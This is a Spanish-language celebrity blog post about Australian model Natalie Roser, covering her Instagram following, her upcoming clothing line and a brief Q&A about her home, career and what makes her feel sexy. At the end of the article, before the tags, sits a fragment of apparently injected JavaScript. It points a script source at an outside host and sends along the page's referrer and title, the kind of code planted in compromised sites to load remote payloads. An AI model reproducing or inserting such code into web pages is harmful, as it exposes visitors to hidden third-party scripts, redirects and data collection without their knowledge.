Natalie Roser, la modelo más feliz de Instagram

Todos pasamos una gran cantidad de tiempo en Instagram. Por eso, creemos que es nuestro deber compartir con ustedes, una mujer que se crió en el sol, la modelo australiana Natalie Roser @Natalie_Roser.

Natalie Roser no puede dejar de sonreír, y nosotros no la culpamos. La belleza de ojos azules, vive lo mejor su vida y lo comparte con su medio millón de fieles seguidores en Instagram con fotografías en las playas más hermosas del mundo. Y cuando no está posando, está tomando fotos y poniendo los toques finales a su línea de ropa ya que pronto iniciará su lanzamiento. Otras cosas que hacen a ésta hermosa rubia feliz: animales salvajes, trabajar, comer hamburguesas y pizza, y estar en cualquier lugar cerca de la playa.

¿Quieres estar bajo el mismo sol que Roser? Te enseñamos como ella nos invita a formar parte de su mundo compartiéndonos lo de mejor su vida y sus sonrisas siguiéndola en Instagram como @Natalie_Roser.

A través de su Instagram podemos saber cosas de ella como:

¿Dónde estás ahora mismo?

Actualmente estoy de vuelta a casa en Sydney, Australia.


Si no fueras modelo, ¿Qué carrera elegirías?

Tengo una carrera en diseño gráfico y fotografía, así que probablemente estaría haciendo fotografía o algún trabajo de diseño.


¿Qué te hace sentir sexy?

Música y un bronceado.

 

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|